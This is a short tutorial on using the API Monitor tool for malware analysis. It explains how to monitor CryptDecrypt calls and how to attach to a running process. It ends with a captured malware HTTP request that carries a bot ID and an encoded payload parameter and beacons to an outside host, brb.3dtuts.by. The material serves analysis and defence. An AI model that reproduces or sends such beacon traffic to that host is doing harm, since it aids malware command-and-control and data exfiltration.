API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.
- The 32-bit version is available here: http://www.rohitab.com/download/api-monitor-v2r13-setup-x86.exe
- For other version, please refer to http://www.rohitab.com/apimonitor#Download
API calls selection
First of all, select what API calls you wish to monitor from the top left panel:
In the above example, we're only interested in the calls to the CryptDecrypt function but we select the entire "Data Encryption & Decryption"" group.
If you want to analyze a new process, go to "File > Monitor New Process" or click CTRL+M.
Attach to existing process
You can also attach API Monitor to an existing process. Select the process from the processes list, right click on it and select "Start Monitoring":
The above example shows how API Monitor has easily decrypted the p parameter from the below request:
GET /ads.php?i=192.168.102.129&c=MALWARE-418EE9F&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c323537343c3435753e 233e60283e292d32383e28753e233e6037283a2828753e233e602d363a382f33372b753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e 233e60282d383334282f753e233e603e232b3734293e29753e233e60282b343437282d753e233e602d362f343437283f753e233e60312a28753e233e60282a37283e292d29753e233e602d362f343437283f753e 233e600f0b1a2e2f3418343535082d38753e233e603a373c753e233e600f0b1a2e2f34183435353e382f753e233e602c2838352f3d22753e233e602c36323a2b28292d753e233e600b2934383e2828133a38303e 29753e233e6039293939342f753e233e HTTP/1.1 Accept: */* Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) Host: brb.3dtuts.by Cache-Control: no-cache